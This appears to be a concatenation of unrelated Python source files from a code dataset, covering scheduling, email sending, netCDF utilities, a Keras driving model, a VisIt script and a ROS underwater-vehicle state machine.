    # that cannot be shifted, and this needs to be taken into account when
    # assigning them.
    current_time = 0
    running = True
    while running:
        needs_assignment = False
        for t in tasks:
            avail_resources = t.avail(current_time, t.resource_group)
        if not needs_assignment:
            running = False
if __name__ == '__main__':
    # Build a small pool of four resources and register them with the manager.
    rm = ResourceManager()
    a = Resource("A")
    b = Resource("B")
    c = Resource("C")
    d = Resource("D")
    rm.add(a)
    rm.add(b)
    rm.add(c)
    rm.add(d)
    # numtasks = int(random.random()*20)
    numtasks = 20
    tasks = []
    # Generate tasks with a random duration (1-32) and a random candidate
    # resource group of 1-3 resources.
    for x in range(numtasks):
        fg = [a,b,c,d]
        random.shuffle(fg)
        #print("Fullgroup: %s" % ", ".join([str(x) for x in fg]))
        group = fg[:int(random.random()*3)+1]
        duration = int(random.random()*32)+1
        #print("Group: %s" % ", ".join([str(x) for x in group]))
        t = Task("Prepare Report",duration=duration,
                 resource_group = ResourceGroup(*group))
        tasks.append(t)
    for t in tasks:
        print(str(t))
    # -------------------
    # 1. Create a list of resources
    # 2. Create a list of tasks
    # 3. Create a resource group for each set of tasks
    # 4. Auto assign resources to tasks and level the tasks
    # So, first, go through all the tasks and weight each resource with how many
    # times they appear as available
    for t in tasks:
        for r in t.resource_group.resources:
            r.available_count += 1
    # -------------------
    # As we lay out tasks, we are at a "current time" point. Once all resources
    # are assigned for the current time point, we find the next nearest time
    # point when a resource becomes free - at the end of the shortest next task.
    # Then we begin looking at assignments again.
    #
    # So we start at CT=0, and go through each unassigned task.
    # When we get to an unassigned task, see if any of the resources assigned to
    # it are available at this time.
    # If so, take the set of available resources, sort in inverse
    # weight order, and choose the first.
    #
    # After every assignment, add one to the weight of the resource. The idea is
    # to bias the resource against being assigned again, until other less
    # assigned resources catch up. The only thing I would be afraid of would be
    # a resource who is available across many tasks not getting assigned to any
    # because his score is too high. Maybe it would be best to keep two tallys -
    # the number of available, and the number of assignments, and when sorting
    # in preference order, order first by (avail+assigned), and then within a
    # given group, order by assigned. This way, if someone has 7 availability
    # slots and 0 assigned slots, they will get chosen before someone with 5
    # availability slots and 2 assigned slots.
    flatten(tasks)
    print(str(rm))
    # If someone is working on something and they get blocked waiting for
    # something (another task or an outside supplier) then the task needs to be
    # marked as "blocked/paused" and the assigned tasks shuffled accordingly.
    #
    # So the idea is that on your smartphone, you can always bring up a "What do
    # I do now" display, which is sensitive to task priorities and stalls.
    # Another thing I'd really like to try to take into account as much as
    # possible is the fact that switching mental contexts between projects is an
    # uncomfortable and time consuming process, so we'd want to minimize that
    # as much as possible. Probably something like, try to switch projects no
    # more often than once every 2 hours (8 work blocks).
2,976 | 4dd71d01e499f3d0ee49d3bf5204fb3bbb03ede5 | from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr,formataddr
import smtplib
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name,'UTF-8').encode(), addr))
# Send a plain-text test mail via the 163.com SMTP server.
from_addr='gaofeng4280@163.com'
to_addr='1071380275@qq.com'
smtp_server='smtp.163.com'
passwd=input('Password: ')
msg=MIMEText('hello, send by Python...','plain','utf-8')
msg['From']=_format_addr('Python 爱好者<%s>' % from_addr)
msg['To']=_format_addr('开发者<%s>' % to_addr)
msg['Subject']=Header('来自SMTP的邮件...','utf-8').encode()
server=smtplib.SMTP(smtp_server,25)
server.set_debuglevel(1)
# BUG FIX: login() was called with no arguments (TypeError) and the password
# collected above was never used; authenticate with the sender's credentials.
server.login(from_addr, passwd)
server.sendmail(from_addr,[to_addr],msg.as_string())
server.quit()
|
2,977 | 5d55c586c57de8f287d9f51f0cb1f188c8046c29 | #!/bin/python3
def solveMeFirst(a,b):
    """Return the sum of the two inputs."""
    total = a + b
    return total
# Read two integers from stdin (one per line) and print their sum.
print(solveMeFirst(int(input()),int(input())))
|
2,978 | 34f3212b0254cbcb5e1ca535a29d4fe820dcaad8 | from .hacker import HackerRegistrationPage
from .judge import JudgeRegistrationPage
from .mentor import MentorRegistrationPage
from .organizer import OrganizerRegistrationPage
from .user import UserRegistrationPage
|
2,979 | 57490e56833154d3ed3a18b5bf7bc4db32a50d69 | import numpy as np
import json
from netCDF4 import Dataset,stringtochar,chartostring,Variable,Group
def is_json(myjson):
    """Return True if *myjson* parses as a JSON document, else False.

    FIX: the original used a bare `except:` (which also swallows
    KeyboardInterrupt/SystemExit) and bound the parsed value to an unused
    variable; catch only the errors json.loads actually raises for bad input.
    """
    try:
        json.loads(myjson)
    except (ValueError, TypeError):
        return False
    return True
def getType(type):
    """Return the numpy dtype character code, mapping string kinds to 'S1'/'U1'."""
    code = np.dtype(type).char
    if code == "S":
        return 'S1'
    if code == "U":
        return 'U1'
    return code
def getType3(type):
    """Like getType, but also lowers unsigned/wide integer codes to signed netCDF-3 codes."""
    code = np.dtype(type).char
    remap = {"B": 'b', "H": 'h', "I": 'i', "l": 'i', "S": 'S1', "U": 'U1'}
    return remap.get(code, code)
def prepareTransformAttributes(attributes):
    """Derive scaling parameters for packing a float range into an integer dtype.

    Returns (min, max, int_min, int_max, scale_factor, packed_dtype, float_type)
    where scale_factor maps [min, max] onto the full span of the integer type.
    """
    packed_dtype = "{}".format(attributes.get("type"))
    lo = attributes.get("min")
    hi = attributes.get("max")
    ftype = attributes.get("ftype")
    info = np.iinfo(np.dtype(packed_dtype))
    full_span = np.power(2.0, info.bits) - 1.0
    scale = full_span / (hi - lo)
    return lo, hi, info.min, info.max, scale, packed_dtype, ftype
def getT(attributes,value,isChar=False):
    """Decode a packed netCDF value back to its float/datetime/string form.

    attributes: per-variable metadata with at least 'ftype' and 'type'; when
    'min'/'max' are present and the stored type differs from ftype, the
    integer-packed data is linearly rescaled back onto [min, max].
    isChar: for 'S1' data, return the raw char array instead of joined strings.
    """
    ftype=attributes['ftype']
    if "min" in attributes and "max" in attributes and attributes['type']!=attributes['ftype'] :
        # Invert the packing done in setT: undo the integer-minimum shift,
        # divide by the scale factor, then add back the float minimum.
        min,max,minO,maxO,f,dtype,ftype=prepareTransformAttributes(attributes)
        value=(((value+np.abs(minO))/f)+min).astype(ftype)
    # 'M': stored as milliseconds since epoch -> datetime64[ms].
    if ftype=="M":value=value.astype('datetime64[ms]')
    # 'S1': keep the char array as-is, or join chars back into strings.
    if ftype=="S1":value=value.astype("S1") if isChar else chartostring(value.astype("S1"))
    return value
def setT(attributes,value,isChar=False,variable=None):
    """Encode a value for storage: datetimes to ms floats, strings to char arrays,
    and floats linearly packed into the target integer dtype when min/max are set.

    variable: the target netCDF variable; its second dimension gives the fixed
    string width for 'S1' data. NOTE(review): required (not None) whenever
    ftype is 'S1' and isChar is False.
    """
    ftype=attributes['ftype']
    # 'M': store datetimes as float milliseconds since epoch.
    if ftype=="M":value=value.astype("datetime64[ms]").astype("f8")
    # 'S1': pad strings to the variable's fixed width and split into chars.
    if ftype=='S1' and not isChar:value=stringtochar(np.array(value).astype("S{}".format(variable.shape[1])))
    if "min" in attributes and "max" in attributes and attributes['type']!=attributes['ftype'] :
        # Linear packing: clamp to [min, max], scale onto the integer span,
        # shift by the integer minimum, round, and clamp again before casting.
        min,max,minO,maxO,f,dtype,x=prepareTransformAttributes(attributes)
        value=np.clip(value, min, max)
        value=(value-min)*f-np.abs(minO)
        # value=np.rint(np.nextafter(value, value+1))
        value=np.rint(value)
        value=np.clip(value, minO, maxO)
        value=value.astype(dtype)
    return value
class NpEncoder(json.JSONEncoder):
    """
    Encoder to change numpy type to python type.
    This is used for creating JSON object.
    """
    def default(self, obj):
        # The three numpy kinds are mutually exclusive, so check order is free.
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        if isinstance(obj, np.integer):
            return int(obj)
        if isinstance(obj, np.floating):
            return float(obj)
        # Anything else: defer to the base class (raises TypeError).
        return super(NpEncoder, self).default(obj)
def getDimensionsV(variables, dimensionsV=None):
    """Invert a variable->dimensions mapping into dimension->[variable names].

    variables: dict mapping variable name to a dict with a 'dimensions' list.
    dimensionsV: optional dict to accumulate into; BUG FIX: the original used
    a mutable default argument ({}), so results silently leaked between calls
    that relied on the default. A fresh dict is now created per call.
    """
    if dimensionsV is None:
        dimensionsV = {}
    for vname in variables:
        for dname in variables[vname]['dimensions']:
            dimensionsV.setdefault(dname, []).append(vname)
    return dimensionsV
def getVariablesG(groups):
    """Invert groups→variables into variable→sorted unique group names."""
    var_groups = {}
    for gname in groups:
        for vname in groups[gname]['variables']:
            var_groups.setdefault(vname, []).append(gname)
    # Deduplicate and order group names deterministically.
    return {vname: sorted(set(names)) for vname, names in var_groups.items()}
from compass import models
from compass.models.MetabolicModel import MetabolicModel
def test_sbml_3():
    """RECON1 loaded from SBML has the expected model dimensions."""
    recon1 = models.load_metabolic_model("RECON1_xml")
    assert isinstance(recon1, MetabolicModel)
    assert len(recon1.reactions) == 3742
    assert len(recon1.species) == 2766
def test_sbml_2():
    """RECON2.2 loads with the expected reaction/species counts."""
    recon2 = models.load_metabolic_model("RECON2.2")
    assert isinstance(recon2, MetabolicModel)
    assert len(recon2.reactions) == 7785
    assert len(recon2.species) == 6047
def test_mat():
    """RECON2 loaded from MATLAB format has the expected dimensions."""
    recon2_mat = models.load_metabolic_model("RECON2_mat")
    assert isinstance(recon2_mat, MetabolicModel)
    assert len(recon2_mat.reactions) == 7440
    assert len(recon2_mat.species) == 5063
def test_to_json():
    """Every supported model serializes to a JSON string."""
    # Same load order as before: RECON2.2, RECON1_xml, RECON2_mat.
    for model_name in ("RECON2.2", "RECON1_xml", "RECON2_mat"):
        serialized = models.load_metabolic_model(model_name).to_JSON()
        assert isinstance(serialized, str)
|
2,981 | ed2ae166c4881289b27b7e74e212ba2d6164998b |
import numpy as np
class Element(object):
    """Base class for finite elements.

    Holds an empty element description; concrete subclasses are expected
    to override setup() and the shape-function hooks below.
    """

    def __init__(self):
        # Neutral defaults; setup() is the subclass hook that fills them in.
        self.ndof = 0                    # presumably degrees of freedom — confirm in subclasses
        self.nn = 0                      # presumably node count — confirm in subclasses
        self.ng = 0                      # presumably Gauss-point count — confirm in subclasses
        self.element_type = 0
        self.coord_position = np.array([])
        self.setup()

    def setup(self):
        """Hook: configure element attributes; no-op in the base class."""
        pass

    def shape_function_value(self):
        """Hook: evaluate shape functions; no-op in the base class."""
        pass

    def shape_function_partial(self):
        """Hook: evaluate shape-function derivatives; no-op in the base class."""
        pass
|
import pandas as pd
import numpy as np
from scipy import misc
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import time
import math
import cv2
import matplotlib
matplotlib.use("TkAgg")
from matplotlib import pyplot as plt
from keras.models import Sequential
from keras.layers import Lambda
from keras.layers.core import Dense, Activation, Flatten, Dropout
from keras.layers.convolutional import Convolution2D
from keras.layers.pooling import MaxPooling2D
from keras.optimizers import Adam
from keras.models import load_model
# Data augmentation constants
TRANS_X_RANGE = 10 # Number of translation pixels for augmented data (-RANGE/2, RANGE/2)
TRANS_Y_RANGE = 10 # Number of translation pixels for augmented data (-RANGE/2, RANGE/2)
TRANS_ANGLE = .3 # Maximum angle change when translating in the X direction
OFF_CENTER_IMG = .25 # Angle change when using off center images
DOWNSAMPLE_RATIO = 0.99  # scipy.misc.imresize scale factor applied before cropping
Learning_Rate = 0.0001  # Adam optimizer learning rate
FOLDER = "examples/"  # root folder holding driving_log.csv and the camera frames
EPOCHS = 4  # training epochs for fit_generator
TRAINABLE = True  # NOTE(review): defined but never referenced in this file — confirm before removing
BRIGHTNESS_RANGE = 0.15  # max fractional change applied to the HSV V channel
IMG_ROWS = 300  # model input height after crop/resize
IMG_COLS = 300  # model input width after crop/resize
SHAPE = (IMG_ROWS,IMG_COLS,3)
SAMPLES_TRAIN = 5000  # samples per training epoch
SAMPLES_VALIDATION = 1000  # samples per validation pass
def load_data(data):
    """Read every image path in `data`, downsample and crop it.

    Returns a list of preprocessed images in the same order as the paths.
    """
    images = []
    for path in data:
        img = cv2.imread(path)
        img = misc.imresize(img, size=DOWNSAMPLE_RATIO)
        images.append(crop(img))
    return images
def normalize(data):
    """Linearly scale greyscale pixel values from [0, 255] into [-0.5, 0.5]."""
    lo, hi = -0.5, 0.5
    grey_min, grey_max = 0, 255
    return lo + ((data - grey_min) * (hi - lo)) / (grey_max - grey_min)
def color_change(data):
    """Convert a BGR image to HSV colour space."""
    return cv2.cvtColor(data, cv2.COLOR_BGR2HSV)
def adjust_brightness(im):
    """Randomly scale the V channel by up to ±BRIGHTNESS_RANGE.

    NOTE: the round trip is BGR→HSV but HSV→RGB, exactly as before —
    channel order changes as a side effect.
    """
    hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
    # One uniform draw in [-1, 1), matching the original RNG consumption.
    brightness = BRIGHTNESS_RANGE * np.random.uniform(-1, 1)
    hsv[:, :, 2] = hsv[:, :, 2] * (1 - brightness)
    return cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)
def img_translate(img, angle):
    """Randomly shift `img` in X and Y; the steering angle is corrected
    proportionally to the X shift. Returns (shifted_image, new_angle)."""
    # Two uniform draws, in the same order as before, to keep RNG behavior.
    shift = np.random.uniform(-0.5, 0.5)
    dx = TRANS_X_RANGE * shift
    corrected_angle = angle + (shift * TRANS_ANGLE)
    dy = TRANS_Y_RANGE * np.random.uniform(-0.5, 0.5)
    affine = np.float32([[1, 0, dx], [0, 1, dy]])
    return cv2.warpAffine(img, affine, (img.shape[1], img.shape[0])), corrected_angle
def crop(im):
    """Keep rows from 40% to 87% of the image height (drops sky/hood),
    then resize to the model input size (IMG_ROWS x IMG_COLS)."""
    height = np.array(im).shape[0]
    top, bottom = int(height * 0.4), int(height * 0.87)
    trimmed = im[top:bottom, :, :]
    return cv2.resize(trimmed, (IMG_ROWS, IMG_COLS), interpolation=cv2.INTER_AREA)
def curve_focus(xdata, ydata):
    """Report how many samples have exactly zero steering angle.

    Purely diagnostic: data passes through unchanged.
    """
    zero_count = sum(1 for idx in range(len(xdata)) if ydata[idx] == 0.000)
    print("Total = {}\n0 Steering = {}".format(len(xdata), zero_count))
    return xdata, ydata
def flip(xdata, ydata):
    """Double the dataset: append a left-right mirrored copy of every image
    with its steering angle negated. Returns (new_x, new_y)."""
    mirrored = np.array([np.fliplr(img) for img in xdata])
    return (np.append(xdata, mirrored, axis=0),
            np.append(ydata, -1 * np.asarray(ydata)))
def set_model():
    """Build the steering-angle CNN: in-graph normalization, a 1x1 conv
    (named 'color_conv', presumably a learned colour transform), four ELU
    conv layers, then three ELU dense layers and a linear output."""
    net = Sequential()
    # Normalize pixels to [-1, 1] inside the graph.
    net.add(Lambda(lambda x: x/127.5 - 1.,
                   input_shape=SHAPE,
                   output_shape=SHAPE))
    net.add(Convolution2D(3, 1, 1, border_mode='same', name='color_conv'))
    net.add(Convolution2D(36, 5, 5, border_mode='same', activation="elu", name='conv1'))
    net.add(Convolution2D(48, 3, 3, border_mode='same', activation="elu", name='conv2'))
    net.add(Convolution2D(64, 3, 3, border_mode='same', activation="elu", name='conv3'))
    net.add(Convolution2D(64, 3, 3, border_mode='same', activation="elu", name='conv4'))
    net.add(Flatten(name='flat1'))
    net.add(Dense(100, activation="elu", name='dense1'))
    net.add(Dense(50, activation="elu", name='dense2'))
    net.add(Dense(10, activation="elu", name='dense3'))
    net.add(Dense(1, activation="linear", name='dense4'))
    return net
def my_range(start, end, step):
    """Inclusive range generator for floats; each value is rounded to one
    decimal place before being yielded."""
    current = start
    while current <= end:
        yield round(current, 1)
        current += step
def show_data(log):
    """Debug/visualization scratch function: renders one camera frame at
    full resolution next to its downsampled version, saves the figure and
    terminates the process with exit().

    NOTE(review): everything after the first exit() below is unreachable
    dead code from earlier experiments; it also references names (`fig`
    reuse, `steer`, `X_train`) that would not be valid if it ran — confirm
    before reviving any of it.
    """
    fig = plt.figure(figsize=(8,2))
    a = fig.add_subplot(1,2,1)
    im = cv2.imread(FOLDER+log[560,0].strip())
    im = cv2.cvtColor(im,cv2.COLOR_BGR2RGB)
    a.set_title("Full Resolution")
    plt.axis('off')
    plt.imshow(im)
    im = misc.imresize(im,size=0.2)
    a = fig.add_subplot(1,2,2)
    a.set_title("After 80% Downsampling")
    plt.imshow(im)
    # im = crop(im)
    # im, an = process_line(log[600])
    # a = fig.add_subplot(2,1,2)
    # im, an = process_line(log[600])
    # plt.imshow(im,aspect="auto",interpolation="nearest")
    plt.axis('off')
    fig.savefig('examples/Downsampling.png')
    plt.show()
    exit()
    # ---- unreachable below this line ----
    # plt.hist(steer,bins=100)
    # plt.show()
    # exit()
    count = 1
    y = 0
    steer = log[:,3]
    for x in my_range(-0.8,0.7,0.1):
        while 1:
            y = np.random.randint(len(steer))
            if(round(steer[y],1)==x):
                print("Found {}",(x))
                break
            # else:
            #     print("Discarded {}",steer[y])
        a=fig.add_subplot(4,5,count)
        im = cv2.imread(FOLDER+log[y,0])
        im,angle = process_line(log[y])
        a.set_title(str(x)+" to "+str(round(angle,1)))
        plt.imshow(im,aspect="auto",interpolation="nearest")
        count+=1
        # print(x)
    plt.show()
    exit()
    pic = np.random.randint(len(X_train))
    print(X_train.shape)
    plt.imshow(X_train[pic])
    plt.show()
    exit()
def augment(x, y):
    """Apply the augmentation pipeline (currently just mirror-flipping)."""
    return flip(x, y)
def process_line(sample):
    """Build one augmented training sample from a driving-log row.

    Randomly picks the center (0), left (1) or right (2) camera frame,
    offsets the steering angle for the side cameras, then downsamples,
    crops, brightness-jitters and translates the image.
    Returns (image, angle).
    """
    cam = np.random.randint(3)  # single draw, same RNG consumption as before
    base_angle = float(sample[3])
    angle = base_angle + (0.0, 0.27, -0.27)[cam]
    im = cv2.imread(FOLDER + sample[cam].strip())
    im = misc.imresize(im, size=DOWNSAMPLE_RATIO)
    im = crop(im)
    im = adjust_brightness(im)
    im, angle = img_translate(im, angle)
    return im, angle
def generator(samples, batch_size=32):
    """Endless batch generator for Keras fit_generator.

    Yields shuffled (X, y) batches of processed camera frames and steering
    angles. augment() mirror-flips each batch, so the yielded batch is
    twice `batch_size` in the general case.
    """
    num_samples = len(samples)
    shuffle(samples)
    while 1: # Loop forever so the generator never terminates
        for offset in range(0, num_samples, batch_size):
            batch_samples = samples[offset:offset+batch_size]
            images = []
            angles = []
            for batch_sample in batch_samples:
                # process_line picks a camera at random and augments the frame.
                image,angle = process_line(batch_sample)
                images.append(image)
                angles.append(angle)
            # trim image to only see section with road
            X_train = np.array(images)
            y_train = np.array(angles)
            X_train, y_train = augment(X_train,y_train)
            yield shuffle(X_train, y_train)
if __name__ == "__main__":
    # Driving log: rows of (center, left, right image paths, steering, ...).
    log = pd.read_csv(FOLDER+"driving_log.csv").values
    # NOTE(review): show_data() terminates the process with exit(), so the
    # training code below never runs while this call is left in — this looks
    # like a debug leftover; confirm before training.
    show_data(log)
    print(log.shape)
    train_samples, validation_samples = train_test_split(log,test_size=0.2)
    # Smoke-test the preprocessing pipeline on one random sample.
    im,an = process_line(train_samples[np.random.randint(len(train_samples))])
    print(np.array(im).shape)
    # plt.imshow(im)
    # plt.title(str(an))
    # plt.show()
    # exit()
    model = set_model()
    # model.load_weights('weights.h5',by_name=True)
    adam = Adam(lr=Learning_Rate)
    model.compile(optimizer = adam, loss = 'mean_squared_error')
    history=model.fit_generator(generator(train_samples), samples_per_epoch =
        SAMPLES_TRAIN, validation_data=generator(validation_samples),
        nb_val_samples=SAMPLES_VALIDATION, nb_epoch=EPOCHS, verbose=1)
    model.save_weights('weights.h5')
    model.save('model.h5')
    print("Model saved")
def for_drive(im):
    """Preprocess a live camera frame for prediction: same downsample +
    crop as training (brightness/translation augmentation is skipped)."""
    print(im.shape)
    frame = misc.imresize(im, size=DOWNSAMPLE_RATIO)
    return crop(frame)
|
# Visit 2.12.3 log file
# Auto-generated VisIt session script: opens test.vtk, draws a Pseudocolor
# plot of "scalars", saves a PNG, then restores a recorded 3D view.
ScriptVersion = "2.12.3"
if ScriptVersion != Version():
    # Fix: the original used a bare Python-2 `print` statement, which is a
    # SyntaxError on Python 3. The parenthesized single-argument form below
    # behaves identically on both Python 2 and Python 3.
    print("This script is for VisIt %s. It may not work with version %s" % (ScriptVersion, Version()))
visit.ShowAllWindows()
visit.ShowAllWindows()
visit.OpenDatabase("test.vtk", 0)
# The UpdateDBPluginInfo RPC is not supported in the VisIt module so it will not be logged.
visit.AddPlot("Pseudocolor", "scalars", 1, 1)
visit.DrawPlots()
SaveWindowAtts = visit.SaveWindowAttributes()
SaveWindowAtts.outputToCurrentDirectory = 1
SaveWindowAtts.outputDirectory = "."
SaveWindowAtts.fileName = "visit"
SaveWindowAtts.family = 1
SaveWindowAtts.format = SaveWindowAtts.PNG  # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY
SaveWindowAtts.width = 1024
SaveWindowAtts.height = 1024
SaveWindowAtts.screenCapture = 0
SaveWindowAtts.saveTiled = 0
SaveWindowAtts.quality = 80
SaveWindowAtts.progressive = 0
SaveWindowAtts.binary = 0
SaveWindowAtts.stereo = 0
SaveWindowAtts.compression = SaveWindowAtts.PackBits  # None, PackBits, Jpeg, Deflate
SaveWindowAtts.forceMerge = 0
SaveWindowAtts.resConstraint = SaveWindowAtts.ScreenProportions  # NoConstraint, EqualWidthHeight, ScreenProportions
SaveWindowAtts.advancedMultiWindowSave = 0
visit.SetSaveWindowAttributes(SaveWindowAtts)
visit.SaveWindow()
# Begin spontaneous state
View3DAtts = visit.View3DAttributes()
View3DAtts.viewNormal = (0.264045, 0.220135, 0.939053)
View3DAtts.focus = (1, 1, 1)
View3DAtts.viewUp = (0.100817, 0.961974, -0.253856)
View3DAtts.viewAngle = 30
View3DAtts.parallelScale = 1.73205
View3DAtts.nearPlane = -3.4641
View3DAtts.farPlane = 3.4641
View3DAtts.imagePan = (0, 0)
View3DAtts.imageZoom = 1
View3DAtts.perspective = 1
View3DAtts.eyeAngle = 2
View3DAtts.centerOfRotationSet = 0
View3DAtts.centerOfRotation = (1, 1, 1)
View3DAtts.axis3DScaleFlag = 0
View3DAtts.axis3DScales = (1, 1, 1)
View3DAtts.shear = (0, 0, 1)
View3DAtts.windowValid = 1
visit.SetView3D(View3DAtts)
# End spontaneous state
|
#!/usr/bin/env python
'''
State Machine for the Flare task
'''
import roslib
import rospy
import actionlib
from rospy.timer import sleep
import smach
import smach_ros
from dynamic_reconfigure.server import Server
import math
import os
import sys
import numpy as np
from bbauv_msgs.msg import *
from bbauv_msgs.srv import *
from flare_vision import Flare
#Global variables
isStart = False          # set True when the mission server starts the task
isEnd = False            # NOTE(review): handle_srv sets `isAbort`, not isEnd — confirm which flag is intended
isTestMode = False #If test mode then don't wait for mission call
rosRate = None           # rospy.Rate, created in __main__
flare = None             # Flare vision task instance (flare_vision.Flare)
VisionLoopCount = 0 #Counter for number of times the image is being processed
flareSeen = False
mani_pub = None          # manipulator publisher (unused in this file — confirm)
movement_client = None   # locomotion action client handle
locomotionGoal = None    # goal passed back to the mission planner
flare_params = {'flare_area':0, 'centering_x':0, 'centering_y':0}
#Starts off in disengage class
class Disengage(smach.State):
    """Idle/entry state: blocks while aborted, then (in test mode)
    registers the vision callbacks and transitions to SEARCH."""
    def __init__(self, flare_task):
        smach.State.__init__(self, outcomes=['start_complete', 'complete_outcome', 'aborted'])
        self.flare = flare_task
    def execute(self, userdata):
#        self.flare.unregister()
        if self.flare.isKilled:
            rospy.signal_shutdown("Bye")
            return 'aborted'
        while self.flare.isAborted:
            # Spin until the mission planner un-aborts the task.
            rospy.sleep(rospy.Duration(0.2))
        if self.flare.testing:
            # Test mode: no mission server, so register camera callbacks here.
            self.flare.register()
        rospy.loginfo("Starting Flare")
        return 'start_complete'
#Searches for the flare
class Search(smach.State):
    """Creep forward until the vision node reports the flare, or time out."""
    # Ticks of ~0.5 s each. NOTE(review): the original comment said "5s
    # timeout", but 10000 ticks is far longer — confirm the intended value.
    timeout = 10000
    def __init__(self, flare_task):
        smach.State.__init__(self, outcomes=['search_complete', 'aborted', 'mission_abort'])
        self.flare = flare_task
        if self.flare.testing:
            self.flare.unregisterHeading()
        #rospy.loginfo(self.flare.curHeading)
    def execute(self, userdata):
        #Check for abort signal
        if self.flare.isAborted:
            rospy.signal_shutdown("Bye!")
            return 'aborted'
        #Check if flare found or timeout already
        timecount = 0
        while not self.flare.rectData['detected']:
            if timecount > self.timeout or rospy.is_shutdown() or self.flare.isKilled:
                self.flare.abortMission()
                self.flare.failedTask();
                return 'aborted'
            # Move forward a step and re-check detection every 0.5 s.
            self.flare.sendMovement(forward=1.0)
            rospy.sleep(rospy.Duration(0.5))
            timecount += 1
        return 'search_complete'
#Bash towards the flare!
class Manuoevre(smach.State):
    """Center on the detected flare and close in until its on-screen area
    exceeds the head-on threshold, then hand over to COMPLETING."""
    def __init__(self, flare_task):
        smach.State.__init__(self, outcomes=['manuoevring', 'manuoevre_complete',
                                             'aborted', 'mission_abort'])
        self.flare = flare_task
        # NOTE(review): deltaThresh, prevAngle and count are set but never
        # read in this class — confirm they are leftovers.
        self.deltaThresh = 0.15
        self.prevAngle = []
        self.count = 0
        self.flareSeen = True
    def execute(self,userdata):
        #Check for aborted signal
        if self.flare.isAborted:
            rospy.signal_shutdown("Bye!")
            return 'aborted'
        # #Cannot detect already
        # if not self.flare.rectData['detected']:
        #     self.count += 1
        #     if self.count > 4:
        #         self.flare.taskComplete()
        #         return 'manuoevre_complete'
        # if not self.flare.rectData['detected'] and self.flareSeen:
        #     self.flare.sendMovement(forward=2.0)
        #     rospy.sleep(rospy.Duration(3))
        #     self.flare.taskComplete()
        #     return 'manuoevre_complete'
        #Get to the flare
        # deltaX: normalized horizontal offset of the flare centroid from
        # screen center, in (-0.5, 0.5).
        screenWidth = self.flare.screen['width']
        screenCenterX = screenWidth / 2
        deltaX = (self.flare.rectData['centroids'][0] - screenCenterX) / screenWidth
        #rospy.loginfo("Delta X {}".format(deltaX))
        rospy.loginfo("Area {}".format(self.flare.rectData['area']))
        #Forward if center
        rospy.loginfo("Delta X: {}".format(deltaX))
        if abs(deltaX) < 0.15:
            self.flare.sendMovement(forward=self.flare.forwardOffset)
            rospy.sleep(rospy.Duration(0.5))
        else:
            #Sidemove if too far off center
            # NOTE(review): copysign(deltaX*mult, deltaX) equals deltaX*mult
            # whenever the multiplier is positive — confirm intent.
            sidemove = math.copysign(deltaX*self.flare.deltaXMultiplier, deltaX) #Random number
            # sidemove = math.copysign(0.5, deltaX)
            self.flare.sendMovement(forward=0.10, sidemove=sidemove)
            rospy.sleep(rospy.Duration(0.5))
        #Shoot straight and aim
        if self.flare.rectData['area'] > self.flare.headOnArea:
            return 'manuoevre_complete'
        return 'manuoevring'
        #return 'manuoevre_complete'
class Completing(smach.State):
    """Fine-align on the flare, ram it, retract, and finish the task."""
    def __init__(self, flare_task):
        smach.State.__init__(self, outcomes=['complete_complete', 'completing',
                                             'aborted', 'mission_abort'])
        self.flare = flare_task
        self.count = 0   # consecutive well-centered ticks
    def execute(self,userdata):
        #Check for aborted signal
        if self.flare.isAborted:
            self.flare.isKilled = True
            rospy.signal_shutdown("Bye!")
            return 'aborted'
        # Normalized horizontal offset of the flare from screen center.
        screenWidth = self.flare.screen['width']
        screenCenterX = screenWidth / 2
        deltaX = (self.flare.rectData['centroids'][0] - screenCenterX) / screenWidth
        deltaXMult =2.0
        rospy.loginfo("Delta X:{}".format(deltaX))
        if abs(deltaX) < 0.03:
            self.count += 1
            rospy.loginfo("Count: {}".format(self.count))
            return 'completing'
        # NOTE(review): this branch is only reached when the flare is NOT
        # centered, yet count only grows in the centered branch above — at
        # 0.5 s per tick a threshold of 2000 looks unreachable; confirm.
        if self.count >= 2000:
            self.flare.sendMovement(forward=4.0)
            rospy.loginfo("Hitting the flare")
            self.flare.locomotionClient.wait_for_result()
            self.flare.sendMovement(forward=-2.0) #Retract
            self.flare.locomotionClient.wait_for_result()
            self.flare.taskComplete()
            return 'complete_complete'
        else:
            self.count = 0
            sidemove = math.copysign(deltaX*deltaXMult, deltaX) #Random number
            self.flare.sendMovement(forward=0.00, sidemove=sidemove)
            rospy.sleep(rospy.Duration(0.5))
            return 'completing'
        #self.flare.taskComplete()
        #return 'complete_complete'
'''
Main python thread
'''
def handle_srv(req):
    """mission_to_vision service handler: start or abort the flare task.

    NOTE(review): the abort field is read as `req.abort_reqest` (sic). If
    the .srv definition spells it `abort_request`, this raises
    AttributeError — confirm against bbauv_msgs. Also note `isAbort` is
    created at module scope here, while the globals block declares `isEnd`.
    """
    global isStart
    global isAbort
    global locomotionGoal
    global flare
    rospy.loginfo("Flare service handled")
    if req.start_request:
        rospy.loginfo("Flare is Start")
        isStart = True
        isAbort = False
        #locomotionGoal = req.start_ctrl
    if req.abort_reqest:
        rospy.loginfo("Flare abort received")
        isAbort = True
        isStart = False
        flare.unregister()
    #To fill accordingly
    return mission_to_visionResponse(isStart, isAbort)
#Param config callback
def flareCallback(config, level):
    """dynamic_reconfigure callback: copy tuned 'yellow_*' params onto the
    vision object and refresh the test-mode flag.

    Bug fixes vs. original:
    - the parameter was misspelled `conig` while the body read `config`,
      so every reconfigure raised NameError;
    - `isTestMode` was assigned without a `global` statement, so the
      module-level flag never actually changed.
    """
    global isTestMode
    for param in flare.yellow_params:
        flare.yellow_params[param] = config['yellow_' + param]
    isTestMode = config["testing"]
    return config
#Utility function for normalising heading
def normHeading(heading):
if heading > 360:
return heading - 360
elif heading < 0:
return heading + 360
else:
return heading
if __name__ == '__main__':
    # Build the DISENGAGE -> SEARCH -> MANUOEVRE -> COMPLETING state machine
    # around a single shared Flare vision task, with an introspection server
    # for smach_viewer.
    rospy.init_node("Flare", anonymous=False)
    rosRate = rospy.Rate(20)
    flare_task = Flare()
    rospy.loginfo("Flare loaded!")
    #Create state machine container
